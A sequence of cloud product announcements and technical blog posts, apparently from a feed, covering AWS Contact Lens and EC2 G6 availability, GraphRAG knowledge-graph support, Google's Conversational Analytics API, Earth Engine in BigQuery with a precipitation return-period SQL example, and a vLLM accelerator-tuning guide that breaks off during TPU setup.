Amazon Connect Contact Lens now supports external voice in the Asia Pacific (Sydney), Asia Pacific (Tokyo), Canada (Central), Europe (Frankfurt), and Europe (London) AWS Regions. Amazon Connect integrates with other voice systems for real-time and post-call analytics to help improve customer experience and agent performance with your existing voice system.
Amazon Connect Contact Lens provides call recordings, conversational analytics (including contact transcript, generative AI post-contact summary, sensitive data redaction, contact categorization, theme detection, sentiment analysis, and real-time alerts), and generative AI for automating evaluations of up to 100% of customer interactions (including evaluation forms, automated evaluation, and supervisor review), with a rich user experience to display, search, and filter customer interactions, and programmatic access to data streams and the data lake. If you are an existing Amazon Connect customer, you can expand your use of Contact Lens to other voice systems for consistent analytics in a single data warehouse. If you want to migrate your contact center to Amazon Connect, you can start with Contact Lens analytics and performance insights before migrating your agents.
Starting today, Amazon Elastic Compute Cloud (Amazon EC2) G6 instances powered by NVIDIA L4 GPUs are available in the Middle East (UAE) Region. G6 instances can be used for a wide range of graphics-intensive and machine learning use cases.
Customers can use G6 instances for deploying ML models for natural language processing, language translation, video and image analysis, speech recognition, and personalization as well as graphics workloads, such as creating and rendering real-time, cinematic-quality graphics and game streaming. G6 instances feature up to 8 NVIDIA L4 Tensor Core GPUs with 24 GB of memory per GPU and third generation AMD EPYC processors. They also support up to 192 vCPUs, up to 100 Gbps of network bandwidth, and up to 7.52 TB of local NVMe SSD storage.
Amazon EC2 G6 instances are already available in the AWS US East (N. Virginia and Ohio), US West (Oregon), Europe (Frankfurt, London, Paris, Spain, Stockholm and Zurich), Asia Pacific (Mumbai, Tokyo, Malaysia, Seoul and Sydney), South America (Sao Paulo) and Canada (Central) regions. Customers can purchase G6 instances as On-Demand Instances, Reserved Instances, Spot Instances, or as part of Savings Plans.
Today, we are announcing the support of Bring Your Own Knowledge Graph (BYOKG) for Retrieval-Augmented Generation (RAG) using the open-source GraphRAG Toolkit. This new capability allows customers to connect their existing knowledge graphs to large language models (LLMs), enabling Generative AI applications that deliver more accurate, context-rich, and explainable responses grounded in trusted, structured data.
Previously, customers who wanted to use their own curated graphs for RAG had to build custom pipelines and retrieval logic to integrate graph queries into generative AI workflows. With BYOKG support, developers can now directly leverage their domain-specific graphs, such as those stored in Amazon Neptune Database or Neptune Analytics, through the GraphRAG Toolkit. This makes it easier to operationalize graph-aware RAG, reducing hallucinations and improving reasoning over multi-hop and temporal relationships. For example, a fraud investigation assistant can query a financial services company’s knowledge graph to surface suspicious transaction patterns and provide analysts with contextual explanations. Similarly, a telecom operations chatbot can detect that a series of linked cell towers are consistently failing, trace the dependency paths to affected network switches, and then guide technicians using SOP documents on how to resolve the issue. Developers simply configure the GraphRAG Toolkit with their existing graph data source, and it will orchestrate retrieval strategies that use graph queries alongside vector search to enhance generative AI outputs.
Decision-makers, employees, and customers all need answers where they work: in the applications they use every day. In recent years, the rise of AI-powered BI has transformed our relationship with data, enabling us to ask questions in natural language and get answers fast. But even with support for natural language, the insights you receive are often confined to the data in your BI tool. At Google Cloud, our goal is to change this.
At Google Cloud Next 25, we introduced the Conversational Analytics API, which lets developers embed natural-language query functionality in custom applications, internal tools, or workflows, all backed by trusted data access and scalable, reliable data modeling. The API is already powering first-party Google Cloud conversational experiences including Looker and BigQuery data canvas, and is available for Google Cloud developers of all stripes to implement wherever their imagination takes them. Today we are releasing the Conversational Analytics API in public preview. Start building with our documentation.
The Conversational Analytics API lets you build custom data experiences that provide data, chart, and text answers while leveraging Looker’s trusted semantic model for accuracy or providing critical business and data context to agents in BigQuery. You can embed this functionality to create intuitive data experiences, enable complex analysis via natural language, and even orchestrate conversational analytics agents as ‘tools’ for an orchestrator agent using Agent Development Kit.
The Google Health Population app is being developed with the Conversational Analytics API
Getting to know the Conversational Analytics API
The Conversational Analytics API allows you to interact with your BigQuery or Looker data through chat, from anywhere. Embed side-panel chat next to your Looker dashboards, invoke agents in chat applications like Slack, customize your company’s web applications, or build multi-agent systems.
This API empowers your team to obtain answers precisely when and where they are needed, directly within their daily workflows. It achieves this by merging Google’s advanced AI models and agentic capabilities with Looker’s semantic layer and BigQuery’s context engineering services. The result is natural language experiences that can be shared across your organization, making data-to-insight interaction seamless in your company’s most frequently used applications.
Building with Google’s Analytics and AI stack comes with significant benefits in accurate question answering:
Best-in-class AI for data analytics
An agentic architecture that enables the system to perceive its environment and take actions
Access to Looker’s powerful semantic layer for trustworthy answers
High-performance agent tools, including software functions, charts and APIs, supported by dedicated engineering teams
Trust that your data is secure, with row- and column-level access controls by default
Guard against expensive queries with built-in query limitations
When pairing the Conversational Analytics API with Looker, Looker’s semantic layer reduces data errors in gen AI natural language queries by as much as two-thirds, so that queries are grounded in trusted definitions.
Looker’s semantic layer ensures your conversational analytics are grounded in data truth.
An agentic architecture powered by Google AI
The Conversational Analytics API uses purpose-built models for querying and analyzing data to provide accurate answers, while its flexible agentic architecture lets you configure which capabilities the agent leverages to best provide users with answers to their questions.
Conversational Analytics leverages an agentic architecture to empower agent creators with the right tools.
As a developer, you can compose AI-powered agents with the following tools:
Text-to-SQL, trusted by customers using Gemini in BigQuery
Context retrieval, informed by personalized and organizational usage
Looker’s NL-to-Looker Query Engine, to leverage the analyst-curated semantic layer
Code Interpreter, for advanced analytics like forecasting and root-cause analysis
Charting, to create stunning visualizations and bring data to life
Insights, to explain answers in plain language
These generative AI tools are built upon Google’s latest Gemini models and fine-tuned for specific data analysis tasks to deliver high levels of accuracy. There’s also the Code Interpreter for Conversational Analytics, which provides computations ranging from cohort analysis to period-over-period calculations. Currently in preview, Code Interpreter turns you into a data scientist without having to learn advanced coding or statistical methods. Sign up for early access here.
Context retrieval and generation
A good data analyst isn’t just smart, but also deeply knowledgeable about your business and your data. To provide the same kind of value, a “chat with your data” experience should be just as knowledgeable. That’s why the Conversational Analytics API prioritizes gathering context about your data and queries.
Thanks to retrieval augmented generation (RAG), our Conversational Analytics agents know you and your data well enough to know that when you’re asking for sales in “New York” or “NYC,” you mean “New York City.” The API understands your question’s meaning to match it to the most relevant fields to query, and learns from your organization, recognizing that, for example, “revenue_final_calc” may be queried more frequently than “revenue_intermediate” in your BigQuery project, and adjusts accordingly. Finally, the API learns from your past interactions; it will remember that you queried about “customer lifetime value” in BigQuery Studio on Tuesday when you ask about it again on Friday.
Not all datasets have the context an agent needs to do its work. Column descriptions, business glossaries, and question-query pairs can all improve an agent’s accuracy, but they can be hard to create manually, especially if you have 1,000 tables in your business, each with 500 fields. To speed up the process of teaching your agent, we are including AI-assisted context, using Gemini to suggest metadata that might be useful for your agent to know, while letting you approve or reject changes.
Low maintenance burden
The Conversational Analytics API gives you access to the latest data agent tools from Google Cloud, so you can focus on building your business, not building more agents. You benefit from Google’s continued advancements in generative AI for coding and data analysis.
When you create an agent, we protect your data with Google’s security, best practices, and role-based access controls. Once you share your Looker or BigQuery agent, it can be used across Google Cloud products, such as Agent Development Kit, and in your own applications.
The Conversational Analytics API lets you interact with your data anywhere.
API-powered chats from anywhere
With agents consumable via API, you can surface insights anywhere decision makers need them: while working a customer support ticket, on a tablet in the field, or in your messaging apps.
The Conversational Analytics API is designed to bring benefits to all users, whether they are business users, data analysts building agents, or software developers. When a user asks a question of a conversational agent, answers are delivered rapidly alongside the agent’s thinking process, so it is clear that the right approach was used to reach the insight. Individual updates let your developers control what a user sees (such as answers and charts) and what you want to log for later auditing by analysts (such as SQL and Python code).
Geospatial analytics can transform rich data into actionable insights that drive sustainable business strategy and decision making. At Google Cloud Next ‘25, we announced the preview of Earth Engine in BigQuery, an extension of BigQuery’s current geospatial offering, focused on enabling data analysts to seamlessly join their existing structured data with geospatial datasets derived from satellite imagery. Today, we’re excited to announce the general availability of Earth Engine in BigQuery and the preview of a new geospatial visualization capability in BigQuery Studio. With this new set of tools, we’re making geospatial analysis more accessible to data professionals everywhere.
Bringing Earth Engine to data analysts
Earth Engine in BigQuery makes it easy for data analysts to leverage core Earth Engine capabilities from within BigQuery. Organizations using BigQuery for data analysis can now join raster (and other data created from satellite data) with vector data in their workflows, opening up new possibilities for use cases such as assessing natural disaster risk over time, supply chain optimization, or infrastructure planning based on weather and climate risk data.
This initial release introduced two features:
ST_RegionStats() geography function: A new BigQuery geography function enabling data analysts to derive critical statistics (such as wildfire risk, average elevation, or probability of deforestation) from raster (pixel-based) data within defined geographic boundaries; a minimal usage sketch follows this list.
Earth Engine datasets in BigQuery Sharing: A growing collection of 20 Earth Engine raster datasets available in BigQuery Sharing (formerly Analytics Hub), offering immediate utility for analyzing crucial information such as land cover, weather, and various climate risk indicators.
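To make the shape of a call concrete, here is a minimal sketch of using ST_RegionStats() against a subscribed Earth Engine dataset. The project, table, and band names are placeholders for illustration; the full worked query later in this post shows a real ERA5 band and how the returned struct’s mean, count, and area fields are used.

-- Minimal sketch with placeholder names: summarize one raster band over each
-- polygon in a vector table. The returned value is a STRUCT whose fields
-- (such as mean, count, and area) can be referenced downstream.
SELECT
  regions.region_id,
  ST_REGIONSTATS(
    regions.geometry,   -- GEOGRAPHY column defining the area of interest
    images.id,          -- image ID from the subscribed Earth Engine dataset
    'band_name'         -- raster band to summarize, e.g. a risk indicator
  ) AS band_stats
FROM `my_project.my_dataset.regions` AS regions
CROSS JOIN `my_project.my_subscribed_ee_dataset.images` AS images;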
What’s new in Earth Engine in BigQuery
With the general availability of Earth Engine in BigQuery, users can now leverage an expanded set of features beyond what was previously available in preview:
Enhanced metadata visibility: A new Image Details tab in BigQuery Studio provides expanded information on raster datasets, such as band and image properties. This makes geospatial dataset exploration within BigQuery easier than ever before.
Improved usage visibility: View slot-time used per job and set quotas for Earth Engine in BigQuery to control your consumption, allowing you to manage your costs and better align with your budgets.
We know visualization is crucial to understanding geospatial data and insights in operational workflows. That’s why we’ve been working on improving visualization for the expanded set of BigQuery geospatial capabilities. Today, we’re excited to introduce map visualization in BigQuery Studio, now available in preview.
You might have noticed that the “Chart” tab in the query results pane of BigQuery Studio is now called “Visualization.” Previously, this tab provided a graphical exploration of your query results. With the new Visualization tab, you’ll have all the previous functionality and a new capability to seamlessly visualize geospatial queries (containing a GEOGRAPHY data type) directly on a Google Map, allowing for:
Instant map views: See your query results immediately displayed on a map, transforming raw data into intuitive visual insights.
Interactive exploration: Inspect results, debug your queries, and iterate quickly by interacting directly with the map, accelerating your analysis workflow.
Customized visualization: Visually explore your query results with easy-to-use, customizable styling options, allowing you to highlight key patterns and trends effectively.
Built directly into BigQuery Studio’s query results, map visualization simplifies query building and iteration, making geospatial analysis more intuitive and efficient for everyone.
Visualization tab displays a heat map of census tracts in Colorado with the highest wildfire risk using the Wildfire Risk to Community dataset
Example: Analyzing extreme precipitation events
The integration of Earth Engine in BigQuery with map visualization creates a powerful and unified geospatial analytics platform. Analysts can move from data discovery to complex analysis and visualization within a single platform, significantly reducing the time to insight. For businesses, this offers powerful new capabilities for assessing climate risk directly within their existing data workflows.
Consider a scenario where an insurance provider needs to assess how hydroclimatic risk is changing across its portfolio in Germany. Using Earth Engine in BigQuery, the provider can analyze decades of climate data to identify trends and changes in extreme precipitation events.
The first step is to access the necessary climate data. Through BigQuery Sharing, you can subscribe to Earth Engine datasets directly. For this analysis, we’ll use the ERA5 Land Daily Aggregates dataset (daily grid or “image” weather maps) to track historical precipitation.
BigQuery Sharing listings for Earth Engine with the ERA5 Daily Land Aggregates highlighted (left) and the dataset description with the “Subscribe” button (right)
By subscribing to the dataset, we can now query it. We use the ST_RegionStats() function to calculate statistics (like the mean or sum) for an image band over a specified geographic area. In the query below, we calculate the mean daily precipitation for a subset of counties in Germany for each day in our time range and then find the maximum value for each year:
Next, we analyze the output from the first query to identify changes in extreme event frequency. To do this, we calculate return periods. A return period is a statistical estimate of how likely an event of a certain magnitude is to occur. For example, a “100-year event” is not one that happens precisely every 100 years, but rather an event so intense that it has a 1% (1/100) chance of happening in any given year. This query compares two 30-year periods (1980-2010 vs. 1994-2024) to see how the precipitation values for different return periods have changed:
Note: This query can only be run in US regions. The Overture dataset is US-only. In addition, Earth Engine datasets are rolling out to EU regions over the coming weeks.
-- This UDF implements the Gumbel distribution formula to estimate the event magnitude
-- for a given return period based on the sample mean (xbar) and standard deviation (sigma).
CREATE TEMP FUNCTION
  CalculateReturnPeriod(period INT64, xbar FLOAT64, sigma FLOAT64)
  RETURNS FLOAT64 AS ( ROUND(-LOG(-LOG(1 - (1 / period))) * sigma * .7797 + xbar - (.45 * sigma), 4) );

WITH
-- Step 1: Define the analysis areas.
-- This CTE selects a specific subset of major German counties.
-- ST_SIMPLIFY is used to reduce polygon complexity, improving query performance.
Counties AS (
  FROM `bigquery-public-data.overture_maps.division_area`
  |> WHERE country = 'DE' AND subtype = 'county'
     AND names.primary IN (
       'München',
       'Köln',
       'Frankfurt am Main',
       'Stuttgart',
       'Düsseldorf')
  |> SELECT
       id,
       names.primary AS county,
       ST_SIMPLIFY(geometry, 500) AS geometry
),
-- Step 2: Define the time periods for comparison.
-- These two 30-year, overlapping epochs will be used to assess recent changes.
Epochs AS (
  FROM UNNEST([
    STRUCT('e1' AS epoch, 1980 AS start_year, 2010 AS end_year),
    STRUCT('e2' AS epoch, 1994 AS start_year, 2024 AS end_year)])
),
-- Step 3: Define the return periods to calculate.
ReturnPeriods AS (
  FROM UNNEST([10, 25, 50, 100, 500]) AS years |> SELECT *
),
-- Step 4: Select the relevant image data from the Earth Engine catalog.
-- Replace YOUR_CLOUD_PROJECT with your relevant Cloud Project ID.
Images AS (
  FROM `YOUR_CLOUD_PROJECT.era5_land_daily_aggregated.climate`
  |> WHERE year BETWEEN 1980 AND 2024
  |> SELECT
       id AS img_id,
       start_datetime AS img_date
)
-- Step 5: Begin the main data processing pipeline.
-- This creates a processing task for every combination of a day and a county.
FROM Images
|> CROSS JOIN Counties
-- Step 6: Perform zonal statistics using Earth Engine.
-- ST_REGIONSTATS calculates the mean precipitation for each county for each day.
|> SELECT
     img_id,
     Counties.id AS county_id,
     EXTRACT(YEAR FROM img_date) AS year,
     ST_REGIONSTATS(geometry, img_id, 'total_precipitation_sum') AS areal_precipitation_stats
-- Step 7: Find the annual maximum precipitation.
-- This aggregates the daily results to find the single wettest day for each county within each year.
|> AGGREGATE
     SUM(areal_precipitation_stats.count) AS pixels_examined,
     MAX(areal_precipitation_stats.mean) AS yearly_max_1day_precip,
     ANY_VALUE(areal_precipitation_stats.area) AS pixel_area
   GROUP BY county_id, year
-- Step 8: Calculate statistical parameters for each epoch.
-- Joins the annual maxima to the epoch definitions and then calculates the
-- average and standard deviation required for the Gumbel distribution formula.
|> JOIN Epochs ON year BETWEEN start_year AND end_year
|> AGGREGATE
     AVG(yearly_max_1day_precip * 1e3) AS avg_yearly_max_1day_precip,
     STDDEV(yearly_max_1day_precip * 1e3) AS stddev_yearly_max_1day_precip
   GROUP BY county_id, epoch
-- Step 9: Calculate the return period precipitation values.
-- Applies the UDF to the calculated statistics for each return period.
|> CROSS JOIN ReturnPeriods rp
|> EXTEND
     CalculateReturnPeriod(rp.years, avg_yearly_max_1day_precip, stddev_yearly_max_1day_precip) AS est_max_1day_precip
|> DROP avg_yearly_max_1day_precip, stddev_yearly_max_1day_precip
-- Step 10: Pivot the data to create columns for each epoch and return period.
-- The first PIVOT transforms rows for 'e1' and 'e2' into columns for direct comparison.
|> PIVOT (ANY_VALUE(est_max_1day_precip) AS est_max_1day_precip FOR epoch IN ('e1', 'e2'))
-- The second PIVOT transforms rows for each return period (10, 25, etc.) into columns.
|> PIVOT (ANY_VALUE(est_max_1day_precip_e1) AS e1, ANY_VALUE(est_max_1day_precip_e2) AS e2 FOR years IN (10, 25, 50, 100, 500))
-- Step 11: Re-attach county names and geometries for the final output.
|> LEFT JOIN Counties ON county_id = Counties.id
-- Step 12: Calculate the final difference between the two epochs.
-- This creates the delta values that show the change in precipitation magnitude for each return period.
|> SELECT
     county,
     Counties.geometry,
     e2_10 - e1_10 AS est_10yr_max_1day_precip_delta,
     e2_25 - e1_25 AS est_25yr_max_1day_precip_delta,
     e2_50 - e1_50 AS est_50yr_max_1day_precip_delta,
     e2_100 - e1_100 AS est_100yr_max_1day_precip_delta,
     e2_500 - e1_500 AS est_500yr_max_1day_precip_delta
|> ORDER BY county
To provide quick results as a demonstration, the example query above filters for five populated counties; running the computation for all of Germany would take much longer. When running the analysis for many more geometries (areas of interest), you can break the analysis into two parts:
Calculate the historical time series of maximum daily precipitation for each county in Germany from 1980-2024 and save the resulting table.
Use these results to calculate and compare precipitation return periods for two distinct timeframes.
With the analysis complete, the results can be immediately rendered using the new Visualization feature in BigQuery Studio. This allows the insurance provider to:
Pinpoint high-risk zones: Visually identify clusters of counties with increasing extreme precipitation, for proactive risk mitigation and to optimize policy pricing.
Communicate insights: Share interactive maps with stakeholders, making complex risk assessments understandable at a glance.
Inform strategic decisions: This type of analysis is not limited to insurance. For example, a consumer packaged goods (CPG) company could use these insights to optimize warehouse and distribution center locations, situating them in areas with more stable climate conditions.
Running BigQuery analysis for changing extreme precipitation events in Germany and interactively exploring the results with the new Map visualization
This combination of Earth Engine, BigQuery, and integrated visualization helps businesses move beyond reactive measures, enabling data-driven foresight in a rapidly changing world.
The future of geospatial analysis is here
With the general availability of Earth Engine in BigQuery and the preview of map visualization, we’re helping data professionals across industries to unlock richer, more actionable insights from their geospatial data. From understanding climate risk for buildings in flood-prone areas to optimizing enterprise planning and supply chains, these tools are designed to power operational decision making, helping your business thrive in an increasingly data-driven landscape.
We are continuously working to expand the utility and accessibility of this new set of capabilities, including:
Growing catalog of datasets: Expect more datasets for both Earth Engine and BigQuery Sharing, allowing you to leverage analysis-ready datasets for individual or combined use with custom datasets.
Intelligent geospatial assistance: We envision a future where advanced AI and code generation capabilities will further streamline geospatial workflows. Stay tuned for more on this later this year!
Additional contributors include Hossein Sarshar, Ashish Narasimham, and Chenyang Li.
Large Language Models (LLMs) are revolutionizing how we interact with technology, but serving these powerful models efficiently can be a challenge. vLLM has rapidly become the primary choice for serving open source large language models at scale, but using vLLM is not a silver bullet. Teams that are serving LLMs for downstream applications have stringent latency and throughput requirements that necessitate a thorough analysis of which accelerator to run on and what configuration offers the best possible performance.
This guide provides a bottom-up approach to determining the best accelerator for your use case and optimizing your vLLM configuration to achieve the best and most cost-effective results possible.
Note: This guide assumes that you are familiar with xPUs, vLLM, and the underlying features that make it such an effective serving framework.
Choosing the right accelerator can feel like an intimidating process because each inference use case is unique. There is no a priori ideal setup from a cost/performance perspective; we can’t say model X should always be run on accelerator Y.
The following considerations need to be taken into account to best determine how to proceed:
What model are you using?
Our example model is google/gemma-3-27b-it. This is a 27-billion parameter instruction-tuned model from Google’s Gemma 3 family.
What is the precision of the model you’re using?
We will use bfloat16 (BF16).
Note: Model precision determines the number of bytes used to store each model weight. Common options are float32 (4 bytes), float16 (2 bytes), and bfloat16 (2 bytes). Many models are now also available in quantized formats like 8-bit, 4-bit (e.g., GPTQ, AWQ), or even lower. Lower precision reduces memory requirements and can increase speed, but may come with a slight trade-off in accuracy.
Workload characteristics: How many requests/second are you expecting?
We are targeting support for 100 requests/second.
What is the average sequence length per request?
Input Length: 1500 tokens
Output Length: 200 tokens
The total sequence length per request is therefore 1500 + 200 = 1700 tokens on average.
What is the maximum total sequence length we will need to be able to handle?
Let’s say in this case it is 2000 total tokens
What is the GPU Utilization you’ll be using?
The gpu_memory_utilization parameter in vLLM controls how much of the xPU’s VRAM vLLM may use; whatever remains of that budget after the model weights and activations is pre-allocated for the KV cache. By default this is 90% in vLLM, but we generally want to set it as high as possible to optimize performance without causing OOM issues, which is how our auto_tune.sh script works (as described in the “Benchmarking, Tuning and Finalizing Your vLLM Configuration” section of this post).
What is your prefix cache rate?
This will be determined from application logs, but we’ll estimate 50% for our calculations.
Note: Prefix caching is a powerful vLLM optimization that reuses the computed KV cache for shared prefixes across different requests. For example, if many requests share the same lengthy system prompt, the KV cache for that prompt is calculated once and shared, saving significant computation and memory. The hit rate is highly application-specific. You can estimate it by analyzing your request logs for common instruction patterns or system prompts.
What is your latency requirement?
The end-to-end latency from request to final token should not exceed 10 seconds (P99 E2E). This is our primary performance constraint.
Selecting Accelerators (xPU)
We live in a world of resource scarcity! What does this mean for your use case? You could probably get the best possible latency and throughput by using the most up-to-date hardware, but as an engineer it makes no sense to do so when you can meet your requirements at a better price/performance point.
Identifying Candidate Accelerators
We can refer to our Accelerator-Optimized Machine Family of Google Cloud Instances to determine which accelerator-optimized instances are viable candidates.
We can refer to our Cloud TPU offerings to determine which TPUs are viable candidates.
The following are examples of accelerators that can be used for our workloads, as we will see in the “Calculate Memory Requirements” section.
The following options have different Tensor Parallelism (TP) configurations required depending on the total VRAM. Please see the next section for an explanation of Tensor Parallelism.
Accelerator-optimized Options
g2-standard-48
Provides 4 accelerators with 96 GB of GDDR6
TP = 4
a2-ultragpu-1g
Provides 1 accelerator with 80 GB of HBM
TP = 1
a3-highgpu-1g
Provides 1 accelerator with 80GB of HBM
TP = 1
TPU Options
TPU v5e (16 GB of HBM per chip)
v5litepod-8 provides 8 v5e TPU chips with 128GB of total HBM
TP = 8
TPU v6e aka Trillium (32 GB of HBM per chip)
v6e-4 provides 4 v6e TPU chips with 128GB of total HBM
TP = 4
Calculate Memory Requirements
We must estimate the total minimum VRAM needed. This will tell us if the model can fit on a single accelerator or if we need to use parallelism. Memory utilization can be broken down into two main components: static memory (model weights, activations, and overhead) plus KV cache memory.
model_weight is equal to the number of parameters multiplied by the number of bytes per parameter (determined by the parameter data type/precision)
non_torch_memory is a buffer for memory overhead (estimated ~1GB)
pytorch_activation_peak_memory is the memory required for intermediate activations
kv_cache_memory_per_batch is the memory required for the KV cache per batch
batch_size is the number of sequences that will be processed simultaneously by the engine
A batch size of one is not a realistic value, but it does provide us with the minimum VRAM we will need for the engine to get off the ground. You can vary this parameter in the calculator to see just how much VRAM we will need to support our larger batch sizes of 128 – 512 sequences.
In our case, we find that we need a minimum of ~57 GB of VRAM to run gemma-3-27b-it on vLLM for our specific workload.
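As a rough illustration of that arithmetic, the sketch below estimates the minimum VRAM for a batch size of one. The gemma-3-27b-it architecture constants (layer count, KV heads, head dimension) and the activation estimate are assumptions for illustration only; check the model’s configuration and adjust for your own model and precision.

# Back-of-the-envelope VRAM estimate for serving a model with vLLM.
# The architecture constants below are illustrative assumptions; verify them
# against the model's config before relying on the result.

BYTES_PER_PARAM = 2        # bfloat16
NUM_PARAMS = 27e9          # ~27B parameters (gemma-3-27b-it)

NUM_LAYERS = 62            # assumed layer count
NUM_KV_HEADS = 16          # assumed KV heads
HEAD_DIM = 128             # assumed head dimension

MAX_SEQ_LEN = 2000         # maximum total sequence length from our requirements
BATCH_SIZE = 1             # minimum viable batch size

model_weight_gb = NUM_PARAMS * BYTES_PER_PARAM / 1e9
non_torch_memory_gb = 1.0  # overhead buffer estimate
activation_peak_gb = 1.5   # assumed intermediate-activation peak

# KV cache per token: 2 (K and V) * layers * KV heads * head dim * bytes per value
kv_bytes_per_token = 2 * NUM_LAYERS * NUM_KV_HEADS * HEAD_DIM * BYTES_PER_PARAM
kv_cache_per_batch_gb = kv_bytes_per_token * MAX_SEQ_LEN * BATCH_SIZE / 1e9

total_gb = model_weight_gb + non_torch_memory_gb + activation_peak_gb + kv_cache_per_batch_gb
print(f"Estimated minimum VRAM: {total_gb:.1f} GB")  # ~57.5 GB with these assumptions

Raising BATCH_SIZE toward the 128 - 512 sequences we ultimately want to serve shows how quickly the KV cache comes to dominate the memory budget.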
Is Tensor Parallelism Required?
In this case, the answer is that parallelism is not necessarily required, but we could and should consider our options from a price/performance perspective. Why does it matter?
Very quickly – what is Tensor Parallelism? At the highest level, Tensor Parallelism is a method of breaking apart a large model across multiple accelerators (xPU) so that the model can actually fit on the hardware we need. See here for more information.
vLLM supports Tensor Parallelism (TP). With tensor parallelism, accelerators must constantly communicate and synchronize with each other over the network for the model to work. This inter-accelerator communication can add overhead, which has a negative impact on latency. This means we have a tradeoff between cost and latency in our case.
Note: Tensor parallelism is required for TPUs because of the particular size of this model. v5e and v6e have 16 GB and 32 GB of HBM per chip respectively, as mentioned above, so multiple chips are required to hold the model. In this guide, v6e-4 does pay a slight performance penalty for this communication overhead while a single-accelerator instance would not.
Benchmarking, Tuning and Finalizing Your vLLM Configuration
Now that you have your short list of accelerator candidates, it is time to see the best level of performance we can achieve across each potential setup. We will only cover benchmarking and tuning for an anonymized accelerator-optimized instance and Trillium (v6e) in this section, but the process would be nearly identical for the other accelerators:
Launch, SSH, Update VMs
Pull vLLM Docker Image
Update and Launch Auto Tune Script
Analyze Results
Accelerator-optimized Machine Type
In your project, open the Cloud Shell and enter the following command to launch your chosen instance and its corresponding accelerator and accelerator count. Be sure to update your project ID accordingly and select a zone that supports your machine type for which you have quota.
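As a minimal sketch, the commands below launch and connect to an accelerator-optimized VM; the machine type, zone, image family, and disk size are placeholders to adapt to your environment and quota. A Deep Learning VM image family is a convenient choice here because it ships with GPU drivers and Docker preinstalled.

# Illustrative only - substitute your own project, zone, machine type, and image.
export PROJECT=your-project-id
export ZONE=us-central1-a
export MACHINE_TYPE=a3-highgpu-1g   # or g2-standard-48, a2-ultragpu-1g, ...

gcloud compute instances create vllm-benchmark-vm \
  --project=$PROJECT \
  --zone=$ZONE \
  --machine-type=$MACHINE_TYPE \
  --image-family=YOUR_IMAGE_FAMILY \
  --image-project=YOUR_IMAGE_PROJECT \
  --boot-disk-size=500GB \
  --maintenance-policy=TERMINATE

# SSH in once the VM is running
gcloud compute ssh vllm-benchmark-vm --project=$PROJECT --zone=$ZONE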
Now that we’re in our running instance, we can go ahead and pull the latest vLLM Docker image and then run it interactively. A final detail — if we are using a gated model (and we are in this demo) we will need to provide our HF_TOKEN in the container:
In our running container, we can now find a file called vllm-workspace/benchmarks/auto_tune/auto_tune.sh that we need to update with the information we determined above to tune our vLLM configuration for the best possible throughput and latency.
# navigate to correct directory
cd benchmarks/auto_tune

# update the auto_tune.sh script - use your preferred script editor
nano auto_tune.sh
In the auto_tune.sh script, you will need to make the following updates:
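As a sketch of what those updates look like, using the workload parameters from earlier in this guide: the variable names below are illustrative and may differ between vLLM versions, so mirror whatever your copy of auto_tune.sh defines at the top of the file.

# Illustrative values - align the variable names with your copy of auto_tune.sh.
MODEL="google/gemma-3-27b-it"
TP=1                                     # tensor parallel size for this machine type
INPUT_LEN=1500                           # average input tokens per request
OUTPUT_LEN=200                           # average output tokens per request
MAX_MODEL_LEN=2048                       # must cover our 2000-token maximum sequence
MIN_CACHE_HIT_PCT=50                     # estimated prefix cache hit rate
MAX_LATENCY_ALLOWED_MS=10000             # P99 end-to-end latency requirement
NUM_SEQS_LIST="128 256"                  # candidate max_num_seqs values to sweep
NUM_BATCHED_TOKENS_LIST="512 1024 2048"  # candidate max_num_batched_tokens values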
Our auto_tune.sh script downloads the required model and attempts to start a vLLM server at the highest possible gpu_utilization (0.98 by default). If a CUDA OOM occurs, we go down 1% until we find a stable configuration.
Troubleshooting Note: In rare cases, a vLLM server may be able to start during the initial gpu_utilization test but then fail due to CUDA OOM at the start of the next benchmark. Alternatively, the initial test may fail and then not spawn a follow-up server, resulting in what appears to be a hang. If either happens, edit auto_tune.sh near the very end of the file so that gpu_utilization begins at 0.95 or a lower value rather than 0.98.
Then, for each permutation of num_seqs_list and num_batched_tokens, a server is spun up and our workload is simulated.
A benchmark is first run with an infinite request rate.
If the resulting P99 E2E Latency is within the MAX_LATENCY_ALLOWED_MS limit, this throughput is considered the maximum for this configuration.
If the latency is too high, the script performs a search by iteratively decreasing the request rate until the latency constraint is met. This finds the highest sustainable throughput for the given parameters and latency requirement.
In our result.txt file at /vllm-workspace/auto-benchmark/$TAG/result.txt, we will find which combination of parameters is most efficient, and then we can take a closer look at that run:
Let’s look at the best-performing result to understand our position:
max_num_seqs: 256, max_num_batched_tokens: 512
These were the settings for the vLLM server during this specific test run.
request_rate: 6
This is the final input from the script’s loop. It means your script determined that sending 6 requests per second was the highest rate this server configuration could handle while keeping latency below 10,000 ms. If it tried 7 req/s, the latency was too high.
e2el: 7612.31
This is the P99 latency that was measured when the server was being hit with 6 req/s. Since 7612.31 is less than 10000, the script accepted this as a successful run.
throughput: 4.17
This is the actual, measured output. Even though you were sending requests at a rate of 6 per second, the server could only successfully process them at a rate of 4.17 per second.
TPU v6e (aka Trillium)
Let’s do the same optimization process for TPU now. You will find that vLLM has a robust ecosystem for supporting TPU-based inference and that there is little difference between how we execute TPU benchmarking and the previously described process.
First we’ll need to launch and configure networking for our TPU instance – in this case we can use Queued Resources. Back in our Cloud Shell, use the following command to deploy a v6e-4 instance. Be sure to select a zone where v6e is available.
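A minimal sketch of that deployment follows; the zone, resource name, and runtime version are placeholders, so confirm the current v6e runtime version and zone availability in the Cloud TPU documentation before running it.

# Illustrative only - substitute your project, a zone with v6e capacity, and the
# runtime version recommended for v6e in the Cloud TPU documentation.
export PROJECT=your-project-id
export ZONE=us-east5-b
export TPU_NAME=vllm-v6e-benchmark

gcloud compute tpus queued-resources create $TPU_NAME \
  --node-id=$TPU_NAME \
  --project=$PROJECT \
  --zone=$ZONE \
  --accelerator-type=v6e-4 \
  --runtime-version=v2-alpha-tpuv6e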
# Monitor creation
gcloud compute tpus queued-resources list --zone $ZONE --project $PROJECT
Wait for the TPU VM to become active (status will update from PROVISIONING to ACTIVE). This might take some time depending on resource availability in the selected zone.
SSH directly into the instance with the following command:
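Assuming the same environment variables as above, the connection looks like this:

gcloud compute tpus tpu-vm ssh $TPU_NAME --zone=$ZONE --project=$PROJECT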
Again, we will need to install a dependency, provide our HF_TOKEN and update our auto-tune script as we did above with our other machine type.
# Head to main working directory
cd benchmarks/auto_tune/

# install required library
apt-get install bc

# Provide HF_TOKEN
export HF_TOKEN=XXXXXXXXXXXXXXXXXXXXX

# update auto_tune.sh with your preferred script editor and launch auto_tuner
nano auto_tune.sh
